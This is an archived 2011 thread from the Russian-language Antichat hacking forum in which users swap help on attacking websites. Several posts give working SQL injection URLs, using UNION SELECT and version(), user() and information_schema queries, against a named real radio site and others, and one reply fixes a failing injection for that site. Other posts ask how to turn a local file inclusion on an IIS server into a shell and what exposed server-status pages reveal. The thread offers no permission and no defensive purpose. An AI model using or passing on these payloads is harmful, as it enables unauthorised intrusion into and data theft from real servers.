ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.06.2011, 16:21
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830
Репутация:
4
|
|
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+--+
кроме ошибки ни чего не выводит версию не прозывает,
смог только имя базы узнать onrad2_radio
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+FROM+users--+
Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33
ни выводит ни одну из цифр значит ни чего не сделать?
|
|
|
16.06.2011, 16:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
10040
Репутация:
7
|
|
Сообщение от kroŧ
kroŧ said:
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+--+
кроме ошибки ни чего не выводит версию не прозывает,
смог только имя базы узнать onrad2_radio
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+FROM+users--+
Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33
ни выводит ни одну из цифр значит ни чего не сделать?
зафолсите запрос, там есть вывод
http://www.onradio.gr/play_old.php?id=1+and(version()=user())+union+sele ct+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
|
|
|
|
17.06.2011, 01:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?
|
|
|
|
17.06.2011, 01:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от Lijzer
Lijzer said:
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
17.06.2011, 01:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
2shell_code Знаю на зубок эту тему, вот только написал, что стоит IIS (а не апач), и да ошибку мускула сделать не могу, чтобы проинклюдить логи мускула. фтп не стоит.
з.ы. за отклик спасибо шелл
|
|
|
|
17.06.2011, 15:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
1025
Репутация:
0
|
|
server-status и server-info
Открыты файлы sever-status и server-info.
Что злоумышленник может сделать, используя эту информацию?
Н-р:
http://ts-tvoimir.ru/server-status
Кроме как использовать эту информацию при ддосе, больше же ничего он не почерпнет из этих файлов?
|
|
|
|
17.06.2011, 18:06
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 16
Провел на форуме:
84688
Репутация:
0
|
|
Есть ли в IIS какие нибудь файлы содержащие пути к виртуальным каталогам?
|
|
|
|
18.06.2011, 13:25
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830
Репутация:
4
|
|
http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,concat(grant ee,0x3a,is_grantable),5,6,7,8+from+information_sch ema.user_privileges
Выдает
'user'@'%':NO:USAGE 1 строка
http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,PRIVILEGE_TY PE,5,6,7,8+from+information_schema.user_privileges +where+IS_GRANTABLE=0x594553
пусто
делаю тоже самое но на localhost работает, может кто сталкивался с эти, хотел бы узнать права юзера но как это сделать?
|
|
|
|
18.06.2011, 19:14
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Пишу запрос +union+select+1,2,3,4,5,6,7,8+--
Нужной цифрой является 2. И когда я посылаю что то по типу: +union+select+1,user(),3,4,5,6,7,8+-- или +union+select+1,database(),3,4,5,6,7,8+-- предо мной загружается чистейший, белый лист.
В чем тут проблема? Как это исправить? С какой стороны подойти?
|
|
|
|
18.06.2011, 22:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
unhex(hex(user())) или @@version
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид